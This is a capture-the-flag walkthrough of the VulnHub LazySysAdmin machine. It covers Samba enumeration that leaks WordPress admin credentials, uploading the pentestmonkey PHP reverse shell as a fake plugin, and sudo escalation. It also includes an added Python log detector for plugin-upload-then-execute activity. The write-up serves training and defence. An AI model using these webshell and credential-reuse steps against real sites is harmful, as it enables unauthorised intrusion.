Introduction
Series: LazySysAdmin (1 machine in this series)
Release date: September 20, 2017
Difficulty: Beginner
Environment: VMware Workstation
Goal: Obtain root privileges
What you learn:
- A Samba share leaking sensitive information
- Planting a webshell through WordPress
Target machine: https://www.vulnhub.com/entry/lazysysadmin-1,205/
Information gathering
netdiscover host discovery
sudo netdiscover -i eth0 -r 192.168.229.0/24
Service enumeration
Found SSH running on port 777.
nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144
Testing Samba
Found a read-only share that accepts an empty password; logging in with it reveals many files and directories.
smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$
Use get to download the files you are interested in.
The configuration file yields an account and password: Admin/TogieMYSQL12345^^. Another password also appears: 12345
Logging in to the website
The homepage is a static page with no useful information.
A quick directory brute-force reveals a WordPress installation: dirsearch -u http://192.168.229.144/ --full-url -x 404,403
The page content keeps telling us that his name is togie, so we try logging in next.
Open the default admin URL: http://192.168.229.144/wordpress/wp-admin
and log in with Admin/TogieMYSQL12345^^
The login succeeds.
Attackers often abuse the plugin upload feature to obtain a reverse shell. The following shows how WordPress admin access leads to a shell.
Zip the webshell as a plugin
- Download the reverse shell
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php
This file is also built into Kali at: /usr/share/webshells/php/php-reverse-shell.php
- Edit the file
Set the IP address and port for the reverse shell.
Editing the header of the fake plugin is optional.
- Install the plugin
The installation is reported as successful.
- Get a shell
http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php
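From the defender's side, the sequence above leaves a recognisable trace in the web server log: an authenticated POST to the plugin upload endpoint followed shortly by a direct request to a PHP file inside a plugin directory. The detection below is an added example, not part of the original writeup; the log lines are constructed for illustration and the endpoint and paths follow WordPress conventions.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-format sample lines modelled on the paths used
# in this walkthrough. These are not real logs from the target machine.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2017:10:00:01 +0000] "GET /wordpress/wp-admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [20/Sep/2017:10:00:40 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [20/Sep/2017:10:01:12 +0000] "GET /wordpress/wp-content/plugins/sh/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Sep/2017:10:05:00 +0000] "GET /wordpress/wp-content/plugins/akismet/akismet.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Sep/2017:10:06:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
UPLOAD_PATH = "/wp-admin/update.php"        # WordPress plugin upload handler
UPLOAD_QUERY = "action=upload-plugin"
# A PHP file requested directly from inside a plugin directory.
PLUGIN_PHP_RE = re.compile(r"/wp-content/plugins/[^/]+/[^?]*\.php$")

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    return entry

def find_plugin_upload_exec(log_text, window_minutes=10):
    """Return (client_ip, upload_time_iso, php_path) for every client that
    uploaded a plugin and then directly requested a PHP file under
    wp-content/plugins/ within window_minutes. Legitimate plugin installs
    rarely produce that second request so soon after the upload."""
    last_upload = {}  # client ip -> timestamp of its most recent upload POST
    hits = []
    for line in log_text.splitlines():
        e = parse(line)
        if e is None:
            continue
        path, _, query = e["path"].partition("?")
        if e["method"] == "POST" and path.endswith(UPLOAD_PATH) and UPLOAD_QUERY in query:
            last_upload[e["ip"]] = e["ts"]
        elif e["method"] == "GET" and PLUGIN_PHP_RE.search(path):
            t0 = last_upload.get(e["ip"])
            if t0 is not None and e["ts"] - t0 <= timedelta(minutes=window_minutes):
                hits.append((e["ip"], t0.isoformat(), path))
    return hits
```

Running `find_plugin_upload_exec(SAMPLE_LOG)` flags the 10.0.0.5 client and the `sh/php-reverse-shell.php` request; a matching plugin directory that did not exist before the upload is the confirming artefact on disk.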
Privilege escalation
First, upgrade the shell to an interactive TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color
I found that I could switch to the togie user, and then escalated privileges with sudo.